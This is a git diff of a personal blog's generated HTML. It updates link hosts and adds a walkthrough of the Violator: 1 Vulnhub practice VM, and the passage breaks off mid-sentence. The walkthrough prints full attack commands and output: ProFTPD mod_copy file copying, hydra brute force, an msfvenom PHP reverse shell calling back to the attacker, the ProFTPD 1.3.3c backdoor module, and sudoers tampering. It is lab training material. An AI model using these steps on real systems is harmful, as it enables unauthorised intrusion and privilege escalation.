-<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/base.css">
+<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/base.css">
-<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/simplePagination.css">
+<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/simplePagination.css">
 <script type="text/javascript" src="https://paul.walko.org/javascripts/jquery.js"></script>
 <script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
 <!--
 <link rel="canonical" href=" { { site.url } }{ { page.url } }" />
 -->
 <!--[if lt IE 9]>
-<script src="http://localhost:4000/javascripts/html5shiv.js"></script>
+<script src="https://paul.walko.org/javascripts/html5shiv.js"></script>
 <![endif]-->
-    <link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/markdownreader.css">
+    <link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/markdownreader.css">
-<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/pygments_monokai.css">
+<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/pygments_monokai.css">
-<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/code_block.css">
+<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/code_block.css">
 </head>
@ -82,16 +81,16 @@
        <div class="row navbar">
            <nav class="col-lg-8 col-md-8 col-xs-12">
                <ul class="row">
-                    <li class="col-lg-3"><a href="http://localhost:4000/">HOME</a></li>
+                    <li class="col-lg-3"><a href="https://paul.walko.org/">HOME</a></li>
                    <li class="col-lg-3">
                        <ul class="subnav">
                            <a href="javascript:void(0)">POSTS</a>
-                            <li><a href="http://localhost:4000/category">CATEGORY</a></li>
+                            <li><a href="https://paul.walko.org/category">CATEGORY</a></li>
-                            <li><a href="http://localhost:4000/tag">TAG</a></li>
+                            <li><a href="https://paul.walko.org/tag">TAG</a></li>
                        </ul>
                    </li>
-                    <li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
+                    <li class="col-lg-3"><a href="https://paul.walko.org/about">ABOUT</a></li>
-                    <li class="col-lg-3"><a href="http://localhost:4000/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
+                    <li class="col-lg-3"><a href="https://paul.walko.org/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
                </ul>
            </nav>
@ -133,7 +132,7 @@
                    </ul>
-                    <p id="postMeta">posted on 14 Jun 2016 under category <a href="http://localhost:4000/category/">writeup</a></p>
+                    <p id="postMeta">posted on 14 Jun 2016 under category <a href="https://paul.walko.org/category/">writeup</a></p>
                </header>
@ -491,9 +490,9 @@ code flow successfully changed
    </div>
 </footer>
-<script type="text/javascript" src="http://localhost:4000/javascripts/base.js"></script>
+<script type="text/javascript" src="https://paul.walko.org/javascripts/base.js"></script>
-    <script type="text/javascript" src="http://localhost:4000/javascripts/markdownreader.js"></script>
+    <script type="text/javascript" src="https://paul.walko.org/javascripts/markdownreader.js"></script>
 </body>
 </html>
--- a/_site/writeup/stapler_walkthough.html
+++ b/_site/writeup/stapler_walkthough.html
@ -5,12 +5,12 @@
 <html>
 <head>
    <meta charset="utf-8">
-<!--<script type="text/javascript">
+<script type="text/javascript">
    var host = "paul.walko.org";
    if ((host == window.location.host) && (window.location.protocol != "https:"))
        window.location.protocol = "https";
 </script>
-->
+
 <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
@ -28,41 +28,40 @@
 <title>Stapler: 1 Vulnhub Walkthrough</title>
 <!-- favicon -->
-<link rel="apple-touch-icon" sizes="57x57" href="http://localhost:4000/favicon/apple-icon-57x57.png">
+<link rel="apple-touch-icon" sizes="57x57" href="https://paul.walko.org/favicon/apple-icon-57x57.png">
-<link rel="apple-touch-icon" sizes="60x60" href="http://localhost:4000/favicon/apple-icon-60x60.png">
+<link rel="apple-touch-icon" sizes="60x60" href="https://paul.walko.org/favicon/apple-icon-60x60.png">
-<link rel="apple-touch-icon" sizes="72x72" href="http://localhost:4000/favicon/apple-icon-72x72.png">
+<link rel="apple-touch-icon" sizes="72x72" href="https://paul.walko.org/favicon/apple-icon-72x72.png">
-<link rel="apple-touch-icon" sizes="76x76" href="http://localhost:4000/favicon/apple-icon-76x76.png">
+<link rel="apple-touch-icon" sizes="76x76" href="https://paul.walko.org/favicon/apple-icon-76x76.png">
-<link rel="apple-touch-icon" sizes="114x114" href="http://localhost:4000/favicon/apple-icon-114x114.png">
+<link rel="apple-touch-icon" sizes="114x114" href="https://paul.walko.org/favicon/apple-icon-114x114.png">
-<link rel="apple-touch-icon" sizes="120x120" href="http://localhost:4000/favicon/apple-icon-120x120.png">
+<link rel="apple-touch-icon" sizes="120x120" href="https://paul.walko.org/favicon/apple-icon-120x120.png">
-<link rel="apple-touch-icon" sizes="144x144" href="http://localhost:4000/favicon/apple-icon-144x144.png">
+<link rel="apple-touch-icon" sizes="144x144" href="https://paul.walko.org/favicon/apple-icon-144x144.png">
-<link rel="apple-touch-icon" sizes="152x152" href="http://localhost:4000/favicon/apple-icon-152x152.png">
+<link rel="apple-touch-icon" sizes="152x152" href="https://paul.walko.org/favicon/apple-icon-152x152.png">
-<link rel="apple-touch-icon" sizes="180x180" href="http://localhost:4000/favicon/apple-icon-180x180.png">
+<link rel="apple-touch-icon" sizes="180x180" href="https://paul.walko.org/favicon/apple-icon-180x180.png">
-<link rel="icon" type="image/png" sizes="192x192"  href="http://localhost:4000/favicon/android-icon-192x192.png">
+<link rel="icon" type="image/png" sizes="192x192"  href="https://paul.walko.org/favicon/android-icon-192x192.png">
-<link rel="icon" type="image/png" sizes="32x32" href="http://localhost:4000/favicon/favicon-32x32.png">
+<link rel="icon" type="image/png" sizes="32x32" href="https://paul.walko.org/favicon/favicon-32x32.png">
-<link rel="icon" type="image/png" sizes="96x96" href="http://localhost:4000/favicon/favicon-96x96.png">
+<link rel="icon" type="image/png" sizes="96x96" href="https://paul.walko.org/favicon/favicon-96x96.png">
-<link rel="icon" type="image/png" sizes="16x16" href="http://localhost:4000/favicon/favicon-16x16.png">
+<link rel="icon" type="image/png" sizes="16x16" href="https://paul.walko.org/favicon/favicon-16x16.png">
-<link rel="manifest" href="http://localhost:4000/favicon/manifest.json">
+<link rel="manifest" href="https://paul.walko.org/favicon/manifest.json">
 <meta name="msapplication-TileColor" content="#ffffff">
 <meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
 <meta name="theme-color" content="#ffffff">
-<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/base.css">
+<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/base.css">
-<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/simplePagination.css">
+<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/simplePagination.css">
 <script type="text/javascript" src="https://paul.walko.org/javascripts/jquery.js"></script>
 <script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
 <!--
 <link rel="canonical" href=" { { site.url } }{ { page.url } }" />
 -->
 <!--[if lt IE 9]>
-<script src="http://localhost:4000/javascripts/html5shiv.js"></script>
+<script src="https://paul.walko.org/javascripts/html5shiv.js"></script>
 <![endif]-->
-    <link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/markdownreader.css">
+    <link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/markdownreader.css">
-<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/pygments_monokai.css">
+<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/pygments_monokai.css">
-<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/code_block.css">
+<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/code_block.css">
 </head>
@ -82,16 +81,16 @@
        <div class="row navbar">
            <nav class="col-lg-8 col-md-8 col-xs-12">
                <ul class="row">
-                    <li class="col-lg-3"><a href="http://localhost:4000/">HOME</a></li>
+                    <li class="col-lg-3"><a href="https://paul.walko.org/">HOME</a></li>
                    <li class="col-lg-3">
                        <ul class="subnav">
                            <a href="javascript:void(0)">POSTS</a>
-                            <li><a href="http://localhost:4000/category">CATEGORY</a></li>
+                            <li><a href="https://paul.walko.org/category">CATEGORY</a></li>
-                            <li><a href="http://localhost:4000/tag">TAG</a></li>
+                            <li><a href="https://paul.walko.org/tag">TAG</a></li>
                        </ul>
                    </li>
-                    <li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
+                    <li class="col-lg-3"><a href="https://paul.walko.org/about">ABOUT</a></li>
-                    <li class="col-lg-3"><a href="http://localhost:4000/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
+                    <li class="col-lg-3"><a href="https://paul.walko.org/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
                </ul>
            </nav>
@ -131,7 +130,7 @@
                    </ul>
-                    <p id="postMeta">posted on 19 Jun 2016 under category <a href="http://localhost:4000/category/">writeup</a></p>
+                    <p id="postMeta">posted on 19 Jun 2016 under category <a href="https://paul.walko.org/category/">writeup</a></p>
                </header>
@ -467,9 +466,9 @@ b6b545dc11b7a270f4bad23432190c75162c4a2b
    </div>
 </footer>
-<script type="text/javascript" src="http://localhost:4000/javascripts/base.js"></script>
+<script type="text/javascript" src="https://paul.walko.org/javascripts/base.js"></script>
-    <script type="text/javascript" src="http://localhost:4000/javascripts/markdownreader.js"></script>
+    <script type="text/javascript" src="https://paul.walko.org/javascripts/markdownreader.js"></script>
 </body>
 </html>
--- a/_site/writeup/violator_walkthrough.html
+++ b/_site/writeup/violator_walkthrough.html
@ -0,0 +1,535 @@
 <!DOCTYPE html>
 <html>
 <head>
    <meta charset="utf-8">
 <script type="text/javascript">
    var host = "paul.walko.org";
    if ((host == window.location.host) && (window.location.protocol != "https:"))
        window.location.protocol = "https";
 </script>
 <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-79393488-1', 'auto');
  ga('send', 'pageview');
 </script>
 <meta http-equiv="X-UA-Compatible" content="IE=edge">
 <meta name="viewport" content="width=device-width, initial-scale=1">
 <meta name="description" content="Walkthrough for Violator: 1 VM on Vulnhub">
 <title>Violator: 1, Vulnhub Walkthrough</title>
 <!-- favicon -->
 <link rel="apple-touch-icon" sizes="57x57" href="https://paul.walko.org/favicon/apple-icon-57x57.png">
 <link rel="apple-touch-icon" sizes="60x60" href="https://paul.walko.org/favicon/apple-icon-60x60.png">
 <link rel="apple-touch-icon" sizes="72x72" href="https://paul.walko.org/favicon/apple-icon-72x72.png">
 <link rel="apple-touch-icon" sizes="76x76" href="https://paul.walko.org/favicon/apple-icon-76x76.png">
 <link rel="apple-touch-icon" sizes="114x114" href="https://paul.walko.org/favicon/apple-icon-114x114.png">
 <link rel="apple-touch-icon" sizes="120x120" href="https://paul.walko.org/favicon/apple-icon-120x120.png">
 <link rel="apple-touch-icon" sizes="144x144" href="https://paul.walko.org/favicon/apple-icon-144x144.png">
 <link rel="apple-touch-icon" sizes="152x152" href="https://paul.walko.org/favicon/apple-icon-152x152.png">
 <link rel="apple-touch-icon" sizes="180x180" href="https://paul.walko.org/favicon/apple-icon-180x180.png">
 <link rel="icon" type="image/png" sizes="192x192"  href="https://paul.walko.org/favicon/android-icon-192x192.png">
 <link rel="icon" type="image/png" sizes="32x32" href="https://paul.walko.org/favicon/favicon-32x32.png">
 <link rel="icon" type="image/png" sizes="96x96" href="https://paul.walko.org/favicon/favicon-96x96.png">
 <link rel="icon" type="image/png" sizes="16x16" href="https://paul.walko.org/favicon/favicon-16x16.png">
 <link rel="manifest" href="https://paul.walko.org/favicon/manifest.json">
 <meta name="msapplication-TileColor" content="#ffffff">
 <meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
 <meta name="theme-color" content="#ffffff">
 <link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/base.css">
 <link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/simplePagination.css">
 <script type="text/javascript" src="https://paul.walko.org/javascripts/jquery.js"></script>
 <link rel="canonical" href=" { { site.url } }{ { page.url } }" />
 <!--[if lt IE 9]>
 <script src="https://paul.walko.org/javascripts/html5shiv.js"></script>
 <![endif]-->
    <link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/markdownreader.css">
 <link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/pygments_monokai.css">
 <link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/code_block.css">
 </head>
 <body>
    <header id="l-header">
    <div class="container">
        <div class="row logo">
            <div class="col-lg-7">
                <h1>Paul Walko</h1>
            </div>
        </div>
        <div class="row navicon">
            <a href=""><i class="fa fa-navicon"></i></a>
        </div>
        <div class="row navbar">
            <nav class="col-lg-8 col-md-8 col-xs-12">
                <ul class="row">
                    <li class="col-lg-3"><a href="https://paul.walko.org/">HOME</a></li>
                    <li class="col-lg-3">
                        <ul class="subnav">
                            <a href="javascript:void(0)">POSTS</a>
                            <li><a href="https://paul.walko.org/category">CATEGORY</a></li>
                            <li><a href="https://paul.walko.org/tag">TAG</a></li>
                        </ul>
                    </li>
                    <li class="col-lg-3"><a href="https://paul.walko.org/about">ABOUT</a></li>
                    <li class="col-lg-3"><a href="https://paul.walko.org/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
                </ul>
            </nav>
            <div class="search col-lg-4 col-md-4 col-xs-12">
                <form id="dummySearch">
                    <label for="search"></label>
                    <input id="search" name="serach" type="text" placeholder="Not That Dummy Search">
                    <i class="fa fa-search"></i>
                </form>
                <script>
                $(function(){
                    $('#dummySearch').submit(function(e) {
                        e.preventDefault();
                        keyword = $('#search').val();
                        url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
                        location.href = url;
                    })
                })
                </script>
            </div>
        </div>
    </div>
 </header>
    <div class="container">
        <div class="row">
            <div id="markdown-container" class="col-lg-9">
                <header>
                    <p id="postTitle">Violator: 1, Vulnhub Walkthrough</p>
                    <ul class="tags clearfix">
                        <li><i class="fa fa-tag"></i> vulnhub</li>
                        <li><i class="fa fa-tag"></i> hacking</li>
                    </ul>
                    <p id="postMeta">posted on 08 Jul 2016 under category <a href="https://paul.walko.org/category/">writeup</a></p>
                </header>
                <p>Before I begin, here’s some hints given at the start of the vm:</p>
 <ul>
  <li>Vince Clarke can help you with the Fast Fashion.</li>
  <li>The challenge isn’t over with root. The flag is something special.</li>
  <li>I have put a few trolls in, but only to sport with you.</li>
 </ul>
 <h1 id="get-the-ip-and-check-for-services">Get the IP and check for services</h1>
 <div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [04:21:07] [~]
 -&gt; % nmap -sn 192.168.1.0/24 | grep violator
 Nmap scan report for violator (192.168.1.108)
 paul@archyoga [04:21:36] [~]
 -&gt; % nmap -p- -sV 192.168.1.108
 Starting Nmap 7.12 ( https://nmap.org ) at 2016-07-09 16:21 EDT
 Nmap scan report for violator (192.168.1.108)
 Host is up (0.0086s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     ProFTPD 1.3.5rc3
 80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
 Service Info: OS: Unix
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 23.49 seconds
 </code></pre>
 </div>
 <p>So there’s a website and an proFTPD v1.3.5rc3 server running on the machine. The website just says “I Say.. I say… I say boy! You’re barkin up the wrong tree!” along with Foghorn Leghorn.</p>
 <p>However, in the source I found this: <code class="highlighter-rouge">&lt;-- https://en.wikipedia.org/wiki/Violator_(album) --&gt;</code></p>
 <p>I found an exploit through <a href="http://exploit-db.com">http://exploit-db.com</a> for proFTPD 1.3.5 (CVE: 2015-3306) that allows you to copy files without logging into the server:</p>
 <p>I wasn’t sure what to copy, so I just copied anything I could by copying <code class="highlighter-rouge">/proc/self/root</code> to <code class="highlighter-rouge">/var/www/html/root</code>, this making everything except the root user directory accessible:</p>
 <div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [04:49:25] [~]
 -&gt; % ftp 192.168.1.108
 Connected to 192.168.1.108.
 220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.1.108]
 Name (192.168.1.108:paul):
 331 Password required for paul
 Password:
 530 Login incorrect.
 ftp: Login failed.
 Remote system type is UNIX.
 Using binary mode to transfer files.
 ftp&gt; site cpfr /proc/self/root
 350 File or directory exists, ready for destination name
 ftp&gt; site cpto /var/www/html/root
 250 Copy successful
 ftp&gt;
 </code></pre>
 </div>
 <p>Now you can easily see <code class="highlighter-rouge">/etc/passwd</code>, all the home directories, and <code class="highlighter-rouge">/etc/group</code> to determine what to do next.</p>
 <div class="highlighter-rouge"><pre class="highlight"><code>dg:x:1000:1000:Dave Gahan,,,:/home/dg:/bin/bash
 proftpd:x:104:65534::/var/run/proftpd:/bin/false
 ftp:x:105:65534::/srv/ftp:/bin/false
 mg:x:1001:1001:Martin Gore:/home/mg:/bin/bash
 af:x:1002:1002:Andrew Fletcher:/home/af:/bin/bash
 aw:x:1003:1003:Alan Wilder:/home/aw:/bin/bash
 </code></pre>
 </div>
 <p>Notice <code class="highlighter-rouge">dg, mg, af, and aw</code>, who are all members of Depeche Mode, which was referenced in an initial hint. I spent quite some time traversing their home directories, however I didn’t have enough information to do anything yet. I found instructions for a Wermache enigma machine and some other hints, but I still needed key. I’ll come back to this part in more detail later.</p>
 <h1 id="get-access-to-the-server">Get access to the server</h1>
 <p>In <code class="highlighter-rouge">/etc/group</code>, I can see that user <code class="highlighter-rouge">dg</code> is a member of several groups, so let’s try to crack that password:</p>
 <p>The only possible solution I have for this is the link to the album for Violator.</p>
 <div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [06:13:59] [~]
 -&gt; % cewl "https://en.wikipedia.org/wiki/Violator_(album)" -m 6 -w passwords.txt
 CeWL 5.1 Robin Wood (robin@digi.ninja) (http://digi.ninja)
 paul@archyoga [06:23:38] [~]
 -&gt; % tr '[:upper:]' '[:lower:]' &lt; passwords.txt &gt; passwords1.txt
 paul@archyoga [06:23:40] [~]
 -&gt; % sed -i "s/ //g" passwords1.txt
 paul@archyoga [06:23:42] [~]
 -&gt; % hydra -t 1 -l dg -P ./passwords1.txt -vV 192.168.1.108 ftp
 Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
 ...
 [21][ftp] host: 192.168.1.108 login: dg password: policyoftruth
 [STATUS] attack finished for 192.168.1.108 (valid pair found)
 1 of 1 target successfully completed, 1 valid password found
 </code></pre>
 </div>
 <p>First I used cewl to generate a password list based on the given url, then removed all the spaces and converted everything to lowercase using <code class="highlighter-rouge">tr</code> and <code class="highlighter-rouge">sed</code>.</p>
 <p>Now that I can actually create new files in the server, I generated a reverse php shell and used metasploit to get a shell on the machine:</p>
 <div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [11:03:11] [~]
 -&gt; % msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=1337 R &gt; exploit.php
 fatal: Not a git repository (or any of the parent directories): .git
 No platform was selected, choosing Msf::Module::Platform::PHP from the payload
 No Arch selected, selecting Arch: php from the payload
 No encoder or badchars specified, outputting raw payload
 Payload size: 949 bytes
 paul@archyoga [11:03:15] [~]
 -&gt; % ftp 192.168.1.108                                                                     
 Connected to 192.168.1.108.
 220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.1.108]
 Name (192.168.1.108:paul): dg
 331 Password required for dg
 Password:
 230 User dg logged in
 Remote system type is UNIX.
 Using binary mode to transfer files.
 ftp&gt; cd /var/www/html/
 250 CWD command successful
 ftp&gt; put exploit.php
 200 PORT command successful
 150 Opening BINARY mode data connection for exploit.php
 226 Transfer complete
 949 bytes sent in 6.8e-05 seconds (13.3 Mbytes/s)
 ftp&gt; 221 Goodbye.
 paul@archyoga [11:04:14] [~]
 -&gt; % msfconsole
 ...
 msf &gt; use exploit/multi/handler
 msf exploit(handler) &gt; set lhost 192.168.1.109
 lhost =&gt; 192.168.1.109
 msf exploit(handler) &gt; set lport 1337
 lport =&gt; 1337
 msf exploit(handler) &gt; set payload php/meterpreter/reverse_tcp
 payload =&gt; php/meterpreter/reverse_tcp
 msf exploit(handler) &gt; exploit
 [*] Started reverse TCP handler on 192.168.1.109:1337
 [*] Starting the payload handler...
 [*] Sending stage (33721 bytes) to 192.168.1.108
 [*] Meterpreter session 1 opened (192.168.1.109:1337 -&gt; 192.168.1.108:43369) at 2016-07-09 23:05:11 -0400
 meterpreter &gt; shell
 Process 1314 created.
 Channel 1 created.
 python -c 'import pty;pty.spawn("/bin/sh")'
 $ su dg
 su dg
 Password: policyoftruth
 dg@violator:/var/www/html$
 </code></pre>
 </div>
 <p>If you don’t have much experience with metasploit (especially reverse shells), you should probably research that to get used to it.</p>
 <h1 id="getting-root">Getting Root</h1>
 <p>Now, back to the home directories, if you go to <code class="highlighter-rouge">http://192.168.1.108/root/home</code> there’s 4 directories for each of the 4 suspicious users we saw earlier: <code class="highlighter-rouge">af, aw, dg, mg</code>. The directory for af contains minarke, a terminal based enigma emulator, which is suprisingly difficult to use, aw contains a hint reading <code class="highlighter-rouge">You are getting close... Can you crack the final enigma..?Y</code>, mg contains instructions for a Wermacht enigma machine, and dg contains a very small filesystem with proftpd isntalled.</p>
 <p>Running <code class="highlighter-rouge">sudo -l</code> shows that user <code class="highlighter-rouge">dg</code> has permissions to run proftpd in this directory, however it only allows connections from 127.0.0.1. Once I ran it, I found out it is proftpd 1.3.3c.</p>
 <div class="highlighter-rouge"><pre class="highlight"><code>dg@violator:/var/www/html$ sudo -l
 sudo -l
 Matching Defaults entries for dg on violator:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 User dg may run the following commands on violator:
    (ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
 dg@violator:~/bd/sbin$ sudo /home/dg/bd/sbin/proftpd
 sudo /home/dg/bd/sbin/proftpd
 - setting default address to 127.0.0.1
 localhost - SocketBindTight in effect, ignoring DefaultServer
 dg@violator:/var/www/html$ ftp localhost 2121
 ftp localhost 2121
 ftp: connect to address ::1: Connection refused
 Trying 127.0.0.1...
 Connected to localhost.
 220 ProFTPD 1.3.3c Server (Depeche Mode Violator Server) [127.0.0.1]
 </code></pre>
 </div>
 <p>Then I added a port forward through metasploit so I could access it on my local machine:</p>
 <div class="highlighter-rouge"><pre class="highlight"><code>dg@violator:/var/www/html$ ^C
 Terminate channel 0? [y/N]  N
 [-] core_channel_interact: Operation failed: 1
 meterpreter &gt; portfwd add -L 127.0.0.1 -l 2121 -p 2121 -r 127.0.0.1
 [*] Local TCP relay created: 127.0.0.1:2121 &lt;-&gt; 127.0.0.1:2121
 meterpreter &gt;
 </code></pre>
 </div>
 <p>Now you can access the internal proftpd server v1.3.3c from your machine:</p>
 <div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [01:45:03] [~]
 -&gt; % telnet 127.0.0.1 2121
 Trying 127.0.0.1...
 Connected to 127.0.0.1.
 Escape character is '^]'.
 220 ProFTPD 1.3.3c Server (Depeche Mode Violator Server) [127.0.0.1]
 user dg
 331 Password required for dg
 pass policyoftruth
 230 User dg logged in
 </code></pre>
 </div>
 <p>Now that I have metasploit port forwarding the ftp connection and I’m connected to it, I can use the exploit in proftpd 1.3.3c <a href="https://www.exploit-db.com/exploits/15662/">https://www.exploit-db.com/exploits/15662/</a> with the metasploit module <code class="highlighter-rouge">exploit/unix/ftp/proftpd_133c_backdoor</code> along with the payload <code class="highlighter-rouge">/cmd/unix/generic</code></p>
 <p>First in the using the shell I wrote <code class="highlighter-rouge">dg ALL=(ALL:ALL)  ALL</code> to <code class="highlighter-rouge">/tmp/exploit</code> since I’m using that to get root. Then I used the proftpd v1.3.3c exploit to actually copy it to the right directory:</p>
 <div class="highlighter-rouge"><pre class="highlight"><code>msf &gt; use exploit/unix/ftp/proftpd_133c_backdoor
 msf exploit(proftpd_133c_backdoor) &gt; set rhost 127.0.0.1
 rhost =&gt; 127.0.0.1
 msf exploit(proftpd_133c_backdoor) &gt; set rport 2121
 rport =&gt; 2121
 msf exploit(proftpd_133c_backdoor) &gt; set payload cmd/unix/generic
 payload =&gt; cmd/unix/generic
 msf exploit(proftpd_133c_backdoor) &gt; set cmd chmod 0440 /tmp/exploit &amp;&amp; cp /tmp/exploit /etc/sudoers.d
 cmd =&gt; chmod 0440 /tmp/exploit &amp;&amp; cp /tmp/exploit /etc/sudoers.d
 msf exploit(proftpd_133c_backdoor) &gt; exploit
 [*] 127.0.0.1:2121 - Sending Backdoor Command
 [*] Exploit completed, but no session was created.
 </code></pre>
 </div>
 <div class="highlighter-rouge"><pre class="highlight"><code>dg@violator:/var/www/html$ sudo -l
 ...
 User dg may run the following commands on violator:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
 dg@violator:/var/www/html$ sudo su
 sudo su
 [sudo] password for dg: policyoftruth
 root@violator:/var/www/html# cd /root
 cd /root
 root@violator:~# ls
 ls
 flag.txt
 root@violator:~# cat flag.txt
 cat flag.txt
 I say... I say... I say boy! Pumping for oil or something...?
 ---Foghorn Leghorn "A Broken Leghorn" 1950 (C) W.B.
 </code></pre>
 </div>
 <p>And that get’s us the flag! Now for the <i>final enigma</i>.</p>
 <h1 id="the-final-enigma">The Final Enigma</h1>
 <p>Within the root folder there’s also a suspicious directory <code class="highlighter-rouge">.basildon</code> containing <code class="highlighter-rouge">crocs.rar</code></p>
 <div class="highlighter-rouge"><pre class="highlight"><code>root@violator:~# ls -a
 ls -a
 .  ..  .bash_history  .bashrc  .basildon  flag.txt  .profile
 root@violator:~# cd .basildon
 cd .basildon
 root@violator:~/.basildon# ls -a
 ls -a
 .  ..  crocs.rar
 root@violator:~/.basildon# cp crocs.rar /var/www/html/
 cp crocs.rar /var/www/html/
 </code></pre>
 </div>
 <p>Back on my local machine, I can see the contents of crocs.rar are password protected</p>
 <div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [02:17:20] [~/Downloads]
 -&gt; % unrar e crocs.rar
 ...
 Enter password (will not be echoed) for artwork.jpg:
 </code></pre>
 </div>
 <p>I tried using the password list from eariler, but that didn’t work so I did some googling about crocs and Depeche Mode and found out it is a night club they play at, so I added songs from that to the list and tried it again, and that didn’t work either. I wasn’t sure what else to try, so I regenerated the password list except didn’t take any spaces out or change anything to lowercase, and sure enough it worked!</p>
 <div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [02:21:49] [~/Downloads]
 -&gt; % rar2john crocs.rar &gt; myhash
 paul@archyoga [02:25:11] [~/Downloads]
 -&gt; % rar2john myhash --wordlist=~/passwords4.txt   
 Using default input encoding: UTF-8
 Loaded 1 password hash (rar, RAR3 [SHA1 AES 32/64])
 Press 'q' or Ctrl-C to abort, almost any other key for status
 World in My Eyes (crocs.rar)
 </code></pre>
 </div>
 <p>Inside <code class="highlighter-rouge">crocs.rar</code> there’s just some album artwork, but running exiftool on it reveals a very suspicoius copyright and rights message:</p>
 <div class="highlighter-rouge"><pre class="highlight"><code>UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQ
 LTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWK
 LSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUW
 ISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJM
 FVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLO
 ZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDV
 KFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGP
 FBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIA
 TOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHV
 CRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMW
 RHJEMUSGYBGWXJENRZHZ
 </code></pre>
 </div>
 <p>I’m guessing this is the key for the enigma referenced in the home directories earlier.</p>
 <p>Using the instructions from the <code class="highlighter-rouge">mg</code> home folder I decrypted the code using <a href="http://www.dcode.fr/enigma-machine-cipher">http://www.dcode.fr/enigma-machine-cipher</a> since the given minarke emulator was confusing to use.</p>
 <div class="highlighter-rouge"><pre class="highlight"><code>Lyrics:
 * Use Wermacht with 3 rotors
 * Reflector to B
 Initial: A B C
 Alphabet Ring: C B A
 Plug Board A-B, C-D
 </code></pre>
 </div>
 <p><br /></p>
 <div class="highlighter-rouge"><pre class="highlight"><code>ONE FINAL CHALLENGE FOR YOU BGHX CONGRATULATIONS FOR
 THE FOURTH TIME ON SNARFING THE FLAG ON VIOLATOR ILL
 PRESUME BY NOW YOULL KNOW WHAT I WAS LISTENING TO WHEN
 CREATING THIS CTF I HAVE INCLUDED THINGS WHICH WERE
 DELIBERATLY AVOIDING THE OBVIOUS ROUTE IN TO KEEP YOU ON
 YOUR TOES ANOTHER THOUGHT TO PONDER IS THAT BY ABUSING
 PERMISSIONS YOU ARE ALSO BY DEFINITION A VIOLATOR
 SHOUTOUTS AGAIN TO VULNHUB FOR HOSTING A GREAT LEARNING
